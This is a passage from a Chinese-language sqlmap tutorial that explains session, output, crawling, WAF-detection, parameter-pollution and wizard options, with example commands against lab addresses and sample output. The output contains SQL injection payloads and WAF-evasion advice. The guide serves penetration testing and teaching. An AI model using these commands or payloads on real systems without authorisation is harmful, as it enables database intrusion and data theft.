&#8211;reg-data=1<\/p>\n<h1>\u5e38\u89c4\u53c2\u6570<\/h1>\n<h2>\u4ecesqlite\u4e2d\u8bfb\u53d6session<\/h2>\n<p>\u53c2\u6570\uff1a-s<\/p>\n<p>sqlmap\u5bf9\u6bcf\u4e00\u4e2a\u76ee\u6807\u90fd\u4f1a\u5728output\u8def\u5f84\u4e0b\u81ea\u52a8\u751f\u6210\u4e00\u4e2aSQLite\u6587\u4ef6\uff0c\u5982\u679c\u7528\u6237\u60f3\u6307\u5b9a\u8bfb\u53d6\u7684\u6587\u4ef6\u8def\u5f84\uff0c\u5c31\u53ef\u4ee5\u7528\u8fd9\u4e2a\u53c2\u6570\u3002<\/p>\n<h2>\u4fdd\u5b58HTTP(S)\u65e5\u5fd7<\/h2>\n<p>\u53c2\u6570\uff1a-t<\/p>\n<p>\u8fd9\u4e2a\u53c2\u6570\u9700\u8981\u8ddf\u4e00\u4e2a\u6587\u672c\u6587\u4ef6\uff0csqlmap\u4f1a\u628aHTTP(S)\u8bf7\u6c42\u4e0e\u54cd\u5e94\u7684\u65e5\u5fd7\u4fdd\u5b58\u5230\u90a3\u91cc\u3002<\/p>\n<h2>\u975e\u4ea4\u4e92\u6a21\u5f0f<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;batch<\/p>\n<p>\u7528\u6b64\u53c2\u6570\uff0c\u4e0d\u9700\u8981\u7528\u6237\u8f93\u5165\uff0c\u5c06\u4f1a\u4f7f\u7528sqlmap\u63d0\u793a\u7684\u9ed8\u8ba4\u503c\u4e00\u76f4\u8fd0\u884c\u4e0b\u53bb\u3002<\/p>\n<h2>\u5f3a\u5236\u4f7f\u7528\u5b57\u7b26\u7f16\u7801<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;charset<\/p>\n<p>\u4e0d\u4f7f\u7528sqlmap\u81ea\u52a8\u8bc6\u522b\u7684\uff08\u5982HTTP\u5934\u4e2d\u7684Content-Type\uff09\u5b57\u7b26\u7f16\u7801\uff0c\u5f3a\u5236\u6307\u5b9a\u5b57\u7b26\u7f16\u7801\u5982\uff1a&#8211;charset=GBK<\/p>\n<h2>\u722c\u884c\u7f51\u7ad9URL<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;crawl<\/p>\n<p>sqlmap\u53ef\u4ee5\u6536\u96c6\u6f5c\u5728\u7684\u53ef\u80fd\u5b58\u5728\u6f0f\u6d1e\u7684\u8fde\u63a5\uff0c\u540e\u9762\u8ddf\u7684\u53c2\u6570\u662f\u722c\u884c\u7684\u6df1\u5ea6\u3002<\/p>\n<p>\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-python\">$ python sqlmap.py -u \"http:\/\/192.168.21.128\/sqlmap\/mysql\/\" --batch --crawl=3\n[...]\n[xx:xx:53] [INFO] starting crawler\n[xx:xx:53] [INFO] searching for links with depth 1\n[xx:xx:53] [WARNING] running in a single-thread mode. 
This could take a while\n[xx:xx:53] [INFO] searching for links with depth 2\n[xx:xx:54] [INFO] heuristics detected web page charset 'ascii'\n[xx:xx:00] [INFO] 42\/56 links visited (75%)\n[...]<\/code><\/pre>\n<h2>\u89c4\u5b9a\u8f93\u51fa\u5230CSV\u4e2d\u7684\u5206\u9694\u7b26<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;csv-del<\/p>\n<p>\u5f53dump\u4fdd\u5b58\u4e3aCSV\u683c\u5f0f\u65f6\uff08&#8211;dump-format=CSV\uff09\uff0c\u9700\u8981\u4e00\u4e2a\u5206\u9694\u7b26\u9ed8\u8ba4\u662f\u9017\u53f7\uff0c\u7528\u6237\u4e5f\u53ef\u4ee5\u6539\u4e3a\u522b\u7684 \u5982\uff1a<\/p>\n<p>&#8211;csv-del=&quot;;&quot;<\/p>\n<h2>DBMS\u8eab\u4efd\u9a8c\u8bc1<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;dbms-cred<\/p>\n<p>\u67d0\u4e9b\u65f6\u5019\u5f53\u524d\u7528\u6237\u7684\u6743\u9650\u4e0d\u591f\uff0c\u505a\u67d0\u4e9b\u64cd\u4f5c\u4f1a\u5931\u8d25\uff0c\u5982\u679c\u77e5\u9053\u9ad8\u6743\u9650\u7528\u6237\u7684\u5bc6\u7801\uff0c\u53ef\u4ee5\u4f7f\u7528\u6b64\u53c2\u6570\uff0c\u6709\u7684\u6570\u636e\u5e93\u6709\u4e13\u95e8\u7684\u8fd0\u884c\u673a\u5236\uff0c\u53ef\u4ee5\u5207<\/p>\n<p>\u6362\u7528\u6237\u5982Microsoft SQL Server\u7684OPENROWSET\u51fd\u6570<\/p>\n<h2>\u5b9a\u4e49dump\u6570\u636e\u7684\u683c\u5f0f<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;dump-format<\/p>\n<p>\u8f93\u51fa\u7684\u683c\u5f0f\u53ef\u5b9a\u4e49\u4e3a\uff1aCSV\uff0cHTML\uff0cSQLITE<\/p>\n<h2>\u9884\u4f30\u5b8c\u6210\u65f6\u95f4<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;eta<\/p>\n<p>\u53ef\u4ee5\u8ba1\u7b97\u6ce8\u5165\u6570\u636e\u7684\u5269\u4f59\u65f6\u95f4\u3002<\/p>\n<p>\u4f8b\u5982Oracle\u7684\u5e03\u5c14\u578b\u76f2\u6ce8\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-python\">$ python sqlmap.py -u \"http:\/\/192.168.136.131\/sqlmap\/oracle\/get_int_bool.php?id=1\" -b --eta\n[...]\n[hh:mm:01] [INFO] the back-end DBMS is Oracle\n[hh:mm:01] [INFO] fetching banner\n[hh:mm:01] [INFO] retrieving the length of query output\n[hh:mm:01] [INFO] retrieved: 64\n17% [========&gt; ] 11\/64 ETA 
00:19<\/code><\/pre>\n<p>\u7136\u540e<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-python\">100% [===================================================] 64\/64\n[hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod\nweb application technology: PHP 5.2.6, Apache 2.2.9\nback-end DBMS: Oracle\nbanner: 'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'<\/code><\/pre>\n<p>sqlmap\u5148\u8f93\u51fa\u957f\u5ea6\uff0c\u9884\u8ba1\u5b8c\u6210\u65f6\u95f4\uff0c\u663e\u793a\u767e\u5206\u6bd4\uff0c\u8f93\u51fa\u5b57\u7b26<\/p>\n<h2>\u5237\u65b0session\u6587\u4ef6<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;flush-session<\/p>\n<p>\u5982\u679c\u4e0d\u60f3\u7528\u4e4b\u524d\u7f13\u5b58\u8fd9\u4e2a\u76ee\u6807\u7684session\u6587\u4ef6\uff0c\u53ef\u4ee5\u4f7f\u7528\u8fd9\u4e2a\u53c2\u6570\u3002 \u4f1a\u6e05\u7a7a\u4e4b\u524d\u7684session\uff0c\u91cd\u65b0\u6d4b\u8bd5\u8be5\u76ee\u6807\u3002<\/p>\n<h2>\u81ea\u52a8\u83b7\u53d6form\u8868\u5355\u6d4b\u8bd5<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;forms<\/p>\n<p>\u5982\u679c\u4f60\u60f3\u5bf9\u4e00\u4e2a\u9875\u9762\u7684form\u8868\u5355\u4e2d\u7684\u53c2\u6570\u6d4b\u8bd5\uff0c\u53ef\u4ee5\u4f7f\u7528-r\u53c2\u6570\u8bfb\u53d6\u8bf7\u6c42\u6587\u4ef6\uff0c\u6216\u8005\u901a\u8fc7&#8211;data\u53c2\u6570\u6d4b\u8bd5\u3002 
\u4f46\u662f\u5f53\u4f7f\u7528&#8211;forms\u53c2\u6570\u65f6\uff0c<\/p>\n<p>sqlmap\u4f1a\u81ea\u52a8\u4ece-u\u4e2d\u7684url\u83b7\u53d6\u9875\u9762\u4e2d\u7684\u8868\u5355\u8fdb\u884c\u6d4b\u8bd5\u3002<\/p>\n<h2>\u5ffd\u7565\u5728\u4f1a\u8bdd\u6587\u4ef6\u4e2d\u5b58\u50a8\u7684\u67e5\u8be2\u7ed3\u679c<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;fresh-queries<\/p>\n<p>\u5ffd\u7565session\u6587\u4ef6\u4fdd\u5b58\u7684\u67e5\u8be2\uff0c\u91cd\u65b0\u67e5\u8be2\u3002<\/p>\n<h2>\u4f7f\u7528DBMS\u7684hex\u51fd\u6570<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;hex<\/p>\n<p>\u6709\u65f6\u5019\u5b57\u7b26\u7f16\u7801\u7684\u95ee\u9898\uff0c\u53ef\u80fd\u5bfc\u81f4\u6570\u636e\u4e22\u5931\uff0c\u53ef\u4ee5\u4f7f\u7528hex\u51fd\u6570\u6765\u907f\u514d\uff1a<\/p>\n<p>\u9488\u5bf9PostgreSQL\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-python\">$ python sqlmap.py -u \"http:\/\/192.168.48.130\/sqlmap\/pgsql\/get_int.php?id=1\" --banner --hex -v 3 --parse-errors\n[...]\n[xx:xx:14] [INFO] fetching banner\n[xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR(58))||\n(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)))),\n(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||\n(CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC)\n[xx:xx:15] [INFO] parsed error message: 'pg_query() [&lt;a href='function.pg-query'&gt;function.pg-query&lt;\/a&gt;]: Query\nfailed: ERROR: invalid input syntax for type numeric:\n\":vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d676e752c20636f6d70696c65642062792047\n4343206763632d342e332e7265616c202844656269616e2032e332e322d312e312920342e332e32:nxb:\" in\n&lt;b&gt;\/var\/www\/sqlmap\/libs\/pgsql.inc.php&lt;\/b&gt; on line &lt;b&gt;35&lt;\/b&gt;'\n[xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled by\nGCC gcc-4.3.real (Debian 4.3.2-1.1) 
4.3.2\n[...]<\/code><\/pre>\n<h2>\u81ea\u5b9a\u4e49\u8f93\u51fa\u7684\u8def\u5f84<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;output-dir<\/p>\n<p>sqlmap\u9ed8\u8ba4\u628asession\u6587\u4ef6\u8ddf\u7ed3\u679c\u6587\u4ef6\u4fdd\u5b58\u5728output\u6587\u4ef6\u5939\u4e0b\uff0c\u7528\u6b64\u53c2\u6570\u53ef\u81ea\u5b9a\u4e49\u8f93\u51fa\u8def\u5f84 \u4f8b\u5982\uff1a&#8211;output-dir=\/tmp<\/p>\n<h2>\u4ece\u54cd\u5e94\u4e2d\u83b7\u53d6DBMS\u7684\u9519\u8bef\u4fe1\u606f<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;parse-errors<\/p>\n<p>\u6709\u65f6\u76ee\u6807\u6ca1\u6709\u5173\u95edDBMS\u7684\u62a5\u9519\uff0c\u5f53\u6570\u636e\u5e93\u8bed\u53e5\u9519\u8bef\u65f6\uff0c\u4f1a\u8f93\u51fa\u9519\u8bef\u8bed\u53e5\uff0c\u7528\u8bcd\u53c2\u6570\u53ef\u4ee5\u4f1a\u663e\u51fa\u9519\u8bef\u4fe1\u606f\u3002<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-python\">$ python sqlmap.py -u \"http:\/\/192.168.21.129\/sqlmap\/mssql\/iis\/get_int.asp?id=1\" --parse-errors\n[...]\n[11:12:17] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right\nnumber of query columns. 
Automatically extending the range for current UNION query injection technique test\n11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)\n[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number\nof items in the select list.\n&lt;b&gt;\/sqlmap\/mssql\/iis\/get_int.asp, line 27&lt;\/b&gt;'\n[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)\n[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of\nitems in the select list.\n&lt;b&gt;\/sqlmap\/mssql\/iis\/get_int.asp, line 27&lt;\/b&gt;'\n[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)\n[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of\nitems in the select list.\n&lt;b&gt;\/sqlmap\/mssql\/iis\/get_int.asp, line 27&lt;\/b&gt;'\n[11:12:17] [INFO] target URL appears to have 3 columns in query\n[...]<\/code><\/pre>\n<h1>\u5176\u4ed6\u53c2\u6570<\/h1>\n<h2>\u4f7f\u7528\u53c2\u6570\u7f29\u5199<\/h2>\n<p>\u53c2\u6570\uff1a-z<\/p>\n<p>\u6709\u4f7f\u7528\u53c2\u6570\u592a\u957f\u592a\u590d\u6742\uff0c\u53ef\u4ee5\u4f7f\u7528\u7f29\u5199\u6a21\u5f0f\u3002 \u4f8b\u5982\uff1a<\/p>\n<p>python sqlmap.py &#8211;batch &#8211;random-agent &#8211;ignore-proxy &#8211;technique=BEU -u &quot;www.target.com\/vuln.php?id=1&quot;<\/p>\n<p>\u53ef\u4ee5\u5199\u6210\uff1a<\/p>\n<p>python sqlmap.py -z &quot;bat,randoma,ign,tec=BEU&quot; -u &quot;www.target.com\/vuln.php?id=1&quot;<\/p>\n<p>\u8fd8\u6709\uff1a<\/p>\n<p>python sqlmap.py &#8211;ignore-proxy &#8211;flush-session &#8211;technique=U &#8211;dump -D testdb -T users -u<\/p>\n<p>&quot;www.target.com\/vuln.php?id=1&quot;<\/p>\n<p>\u53ef\u4ee5\u5199\u6210\uff1a<\/p>\n<p>python sqlmap.py -z &quot;ign,flu,bat,tec=U,dump,D=testdb,T=users&quot; -u 
&quot;www.target.com\/vuln.php?id=1&quot;<\/p>\n<h2>\u6210\u529fSQL\u6ce8\u5165\u65f6\u8b66\u544a<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;alert<\/p>\n<h2>\u8bbe\u5b9a\u4f1a\u53d1\u7684\u7b54\u6848<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;answers<\/p>\n<p>\u5f53\u5e0c\u671bsqlmap\u63d0\u51fa\u8f93\u5165\u65f6\uff0c\u81ea\u52a8\u8f93\u5165\u81ea\u5df1\u60f3\u8981\u7684\u7b54\u6848\u53ef\u4ee5\u4f7f\u7528\u6b64\u53c2\u6570\uff1a \u4f8b\u5b50\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-python\">$ python sqlmap.py -u \"http:\/\/192.168.22.128\/sqlmap\/mysql\/get_int.php?id=1\"--technique=E --\nanswers=\"extending=N\" --batch\n[...]\n[xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id'\nheuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads\nspecific for other DBMSes? [Y\/n] Y\n[xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)?\n[Y\/n] N\n[...]<\/code><\/pre>\n<h2>\u53d1\u73b0SQL\u6ce8\u5165\u65f6\u53d1\u51fa\u8702\u9e23\u58f0<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;beep<\/p>\n<p>\u53d1\u73b0sql\u6ce8\u5165\u65f6\uff0c\u53d1\u51fa\u8702\u9e23\u58f0\u3002<\/p>\n<h2>\u542f\u53d1\u5f0f\u68c0\u6d4bWAF\/IPS\/IDS\u4fdd\u62a4<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;check-waf<\/p>\n<p>WAF\/IPS\/IDS\u4fdd\u62a4\u53ef\u80fd\u4f1a\u5bf9sqlmap\u9020\u6210\u5f88\u5927\u7684\u56f0\u6270\uff0c\u5982\u679c\u6000\u7591\u76ee\u6807\u6709\u6b64\u9632\u62a4\u7684\u8bdd\uff0c\u53ef\u4ee5\u4f7f\u7528\u6b64\u53c2\u6570\u6765\u6d4b\u8bd5\u3002 sqlmap\u5c06\u4f1a\u4f7f\u7528\u4e00\u4e2a\u4e0d\u5b58\u5728\u7684<\/p>\n<p>\u53c2\u6570\u6765\u6ce8\u5165\u6d4b\u8bd5<\/p>\n<p>\u4f8b\u5982\uff1a<\/p>\n<p>&amp;foobar=AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 
2&gt;1<\/p>\n<p>\u5982\u679c\u6709\u4fdd\u62a4\u7684\u8bdd\u53ef\u80fd\u8fd4\u56de\u7ed3\u679c\u4f1a\u4e0d\u540c\u3002<\/p>\n<h2>\u6e05\u7406sqlmap\u7684UDF(s)\u548c\u8868<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;cleanup<\/p>\n<p>\u6e05\u9664sqlmap\u6ce8\u5165\u65f6\u4ea7\u751f\u7684udf\u4e0e\u8868\u3002<\/p>\n<h2>\u7981\u7528\u5f69\u8272\u8f93\u51fa<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;desable-coloring<\/p>\n<p>sqlmap\u9ed8\u8ba4\u5f69\u8272\u8f93\u51fa\uff0c\u53ef\u4ee5\u4f7f\u7528\u6b64\u53c2\u6570\uff0c\u7981\u6389\u5f69\u8272\u8f93\u51fa\u3002<\/p>\n<h2>\u4f7f\u7528\u6307\u5b9a\u7684Google\u7ed3\u679c\u9875\u9762<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;gpage<\/p>\n<p>\u9ed8\u8ba4sqlmap\u4f7f\u7528\u524d100\u4e2aURL\u5730\u5740\u4f5c\u4e3a\u6ce8\u5165\u6d4b\u8bd5\uff0c\u7ed3\u5408\u6b64\u9009\u9879\uff0c\u53ef\u4ee5\u6307\u5b9a\u9875\u9762\u7684URL\u6d4b\u8bd5\u3002<\/p>\n<h2>\u4f7f\u7528HTTP\u53c2\u6570\u6c61\u67d3<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;hpp<\/p>\n<p>HTTP\u53c2\u6570\u6c61\u67d3\u53ef\u80fd\u4f1a\u7ed5\u8fc7WAF\/IPS\/IDS\u4fdd\u62a4\u673a\u5236\uff0c\u8fd9\u4e2a\u5bf9ASP\/IIS\u4e0eASP.NET\/IIS\u5e73\u53f0\u5f88\u6709\u6548\u3002<\/p>\n<h2>\u6d4b\u8bd5WAF\/IPS\/IDS\u4fdd\u62a4<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;identify-waf<\/p>\n<p>sqlmap\u53ef\u4ee5\u5c1d\u8bd5\u627e\u51faWAF\/IPS\/IDS\u4fdd\u62a4\uff0c\u65b9\u4fbf\u7528\u6237\u505a\u51fa\u7ed5\u8fc7\u65b9\u5f0f\u3002\u76ee\u524d\u5927\u7ea6\u652f\u630130\u79cd\u4ea7\u54c1\u7684\u8bc6\u522b\u3002<\/p>\n<p>\u4f8b\u5982\u5bf9\u4e00\u4e2a\u53d7\u5230ModSecurity WAF\u4fdd\u62a4\u7684MySQL\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-python\">$ python sqlmap.py -u \"http:\/\/192.168.21.128\/sqlmap\/mysql\/get_int.php?id=1\" --identify-waf -v 3\n[...]\n[xx:xx:23] [INFO] testing connection to the target URL\n[xx:xx:23] [INFO] heuristics detected web page charset 'ascii'\n[xx:xx:23] [INFO] using WAF scripts to detect backend WAF\/IPS\/IDS protection\n[xx:xx:23] [DEBUG] checking 
for WAF\/IDS\/IPS product 'USP Secure Entry Server (United Security Providers)'\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'BinarySEC Web Application Firewall (BinarySEC)'\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'NetContinuum Web Application Firewall\n(NetContinuum\/Barracuda Networks)'\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'Hyperguard Web Application Firewall (art of defence\nInc.)'\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'Cisco ACE XML Gateway (Cisco Systems)'\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'TrafficShield (F5 Networks)'\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'Teros\/Citrix Application Firewall Enterprise\n(Teros\/Citrix Systems)'\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'KONA Security Solutions (Akamai Technologies)'\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'Incapsula Web Application Firewall (Incapsula\/Imperva)'\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'CloudFlare Web Application Firewall (CloudFlare)'\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'Barracuda Web Application Firewall (Barracuda Networks)'\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'webApp.secure (webScurity)'\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'Proventia Web Application Security (IBM)'\n[xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1'\n[xx:xx:23] [DEBUG] page not found (404)\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'KS-WAF (Knownsec)'\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'NetScaler (Citrix Systems)'\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'Jiasule Web Application Firewall (Jiasule)'\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'WebKnight Application Firewall (AQTRONIX)'\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'AppWall (Radware)'\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'ModSecurity: Open Source Web Application 
Firewall\n(Trustwave)'\n[xx:xx:23] [CRITICAL] WAF\/IDS\/IPS identified 'ModSecurity: Open Source Web Application Firewall (Trustwave)'.\nPlease consider usage of tamper scripts (option '--tamper')\n[...]<\/code><\/pre>\n<p>\u6a21\u4eff\u667a\u80fd\u624b\u673a<\/p>\n<p>\u53c2\u6570\uff1a&#8211;mobile<\/p>\n<p>\u6709\u65f6\u670d\u52a1\u7aef\u53ea\u63a5\u6536\u79fb\u52a8\u7aef\u7684\u8bbf\u95ee\uff0c\u6b64\u65f6\u53ef\u4ee5\u8bbe\u5b9a\u4e00\u4e2a\u624b\u673a\u7684User-Agent\u6765\u6a21\u4eff\u624b\u673a\u767b\u9646\u3002<\/p>\n<p>\u4f8b\u5982\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-python\">$ python sqlmap.py -u \"http:\/\/www.target.com\/vuln.php?id=1\" --mobile\n[...]\nwhich smartphone do you want sqlmap to imitate through HTTP User-Agent header?\n[1] Apple iPhone 4s (default)\n[2] BlackBerry 9900\n[3] Google Nexus 7\n[4] HP iPAQ 6365\n[5] HTC Sensation\n[6] Nokia N97\n[7] Samsung Galaxy S\n&gt; 1\n[...]<\/code><\/pre>\n<h2>\u5b89\u5168\u7684\u5220\u9664output\u76ee\u5f55\u7684\u6587\u4ef6<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;purge-output<\/p>\n<p>\u6709\u65f6\u9700\u8981\u5220\u9664\u7ed3\u679c\u6587\u4ef6\uff0c\u800c\u4e0d\u88ab\u6062\u590d\uff0c\u53ef\u4ee5\u4f7f\u7528\u6b64\u53c2\u6570\uff0c\u539f\u6709\u6587\u4ef6\u5c06\u4f1a\u88ab\u968f\u673a\u7684\u4e00\u4e9b\u6587\u4ef6\u8986\u76d6\u3002<\/p>\n<p>\u4f8b\u5982\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-python\">$ python sqlmap.py --purge-output -v 3\n[...]\n[xx:xx:55] [INFO] purging content of directory '\/home\/user\/sqlmap\/output'...\n[xx:xx:55] [DEBUG] changing file attributes\n[xx:xx:55] [DEBUG] writing random data to files\n[xx:xx:55] [DEBUG] truncating files\n[xx:xx:55] [DEBUG] renaming filenames to random values\n[xx:xx:55] [DEBUG] renaming directory names to random values\n[xx:xx:55] [DEBUG] deleting the whole directory 
tree\n[...]<\/code><\/pre>\n<h2>\u542f\u53d1\u5f0f\u5224\u65ad\u6ce8\u5165<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;smart<\/p>\n<p>\u6709\u65f6\u5bf9\u76ee\u6807\u975e\u5e38\u591a\u7684URL\u8fdb\u884c\u6d4b\u8bd5\uff0c\u4e3a\u8282\u7701\u65f6\u95f4\uff0c\u53ea\u5bf9\u80fd\u591f\u5feb\u901f\u5224\u65ad\u4e3a\u6ce8\u5165\u7684\u62a5\u9519\u70b9\u8fdb\u884c\u6ce8\u5165\uff0c\u53ef\u4ee5\u4f7f\u7528\u6b64\u53c2\u6570\u3002<\/p>\n<p>\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-python\">$ python sqlmap.py -u \"http:\/\/192.168.21.128\/sqlmap\/mysql\/get_int.php?ca=17&amp;user=foo&amp;id=1\" --batch --smart\n[...]\n[xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic\n[xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic\n[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable\n[xx:xx:14] [INFO] skipping GET parameter 'ca'\n[xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic\n[xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic\n[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable\n[xx:xx:14] [INFO] skipping GET parameter 'user'\n[xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic\n[xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic\n[xx:xx:14] [INFO] GET parameter 'id' is dynamic\n[xx:xx:14] [WARNING] reflective value(s) found and filtering out\n[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS:\n'MySQL')\n[xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id'\nheuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads\nspecific for other DBMSes? [Y\/n] Y\ndo you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? 
[Y\/n] Y\n[xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'\n[xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable\n[xx:xx:14] [INFO] testing 'MySQL &gt;= 5.0 AND error-based - WHERE or HAVING clause'\n[xx:xx:14] [INFO] GET parameter 'id' is 'MySQL &gt;= 5.0 AND error-based - WHERE or HAVING clause' injectable\n[xx:xx:14] [INFO] testing 'MySQL inline queries'\n[xx:xx:14] [INFO] testing 'MySQL &gt; 5.0.11 stacked queries'\n[xx:xx:14] [INFO] testing 'MySQL &lt; 5.0.12 stacked queries (heavy query)'\n[xx:xx:14] [INFO] testing 'MySQL &gt; 5.0.11 AND time-based blind'\n[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL &gt; 5.0.11 AND time-based blind' injectable\n[xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'\n[xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at\nleast one other potential injection technique found\n[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right\nnumber of query columns. Automatically extending the range for current UNION query injection technique test\n[xx:xx:24] [INFO] target URL appears to have 3 columns in query\n[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable\n[...]<\/code><\/pre>\n<h1>\u521d\u7ea7\u7528\u6237\u5411\u5bfc\u53c2\u6570<\/h1>\n<p>\u53c2\u6570\uff1a&#8211;wizard \u9762\u5411\u521d\u7ea7\u7528\u6237\u7684\u53c2\u6570\uff0c\u53ef\u4ee5\u4e00\u6b65\u4e00\u6b65\u6559\u4f60\u5982\u4f55\u8f93\u5165\u9488\u5bf9\u76ee\u6807\u6ce8\u5165\u3002<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-python\">$ python sqlmap.py --wizard\nsqlmap\/1.0-dev-2defc30 - automatic SQL injection and database takeover tool\nhttp:\/\/sqlmap.org\n[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. 
It is the\nend user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability\nand are not responsible for any misuse or damage caused by this program\n[*] starting at 11:25:26\nPlease enter full target URL (-u): http:\/\/192.168.21.129\/sqlmap\/mssql\/iis\/get_int.asp?id=1\nPOST data (--data) [Enter for None]:\nInjection difficulty (--level\/--risk). Please choose:\n[1] Normal (default)\n[2] Medium\n[3] Hard\n&gt; 1\nEnumeration (--banner\/--current-user\/etc). Please choose:\n[1] Basic (default)\n[2] Smart\n[3] All\n&gt; 1\nsqlmap is running, please wait..\nheuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip\ntest payloads specific for other DBMSes? [Y\/n] Y\ndo you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y\/n] Y\nGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y\/N] N\nsqlmap identified the following injection points with a total of 25 HTTP(s) requests:\n---\nPlace: GET\nParameter: id\nType: boolean-based blind\nTitle: AND boolean-based blind - WHERE or HAVING clause\nPayload: id=1 AND 2986=2986\nType: error-based\nTitle: Microsoft SQL 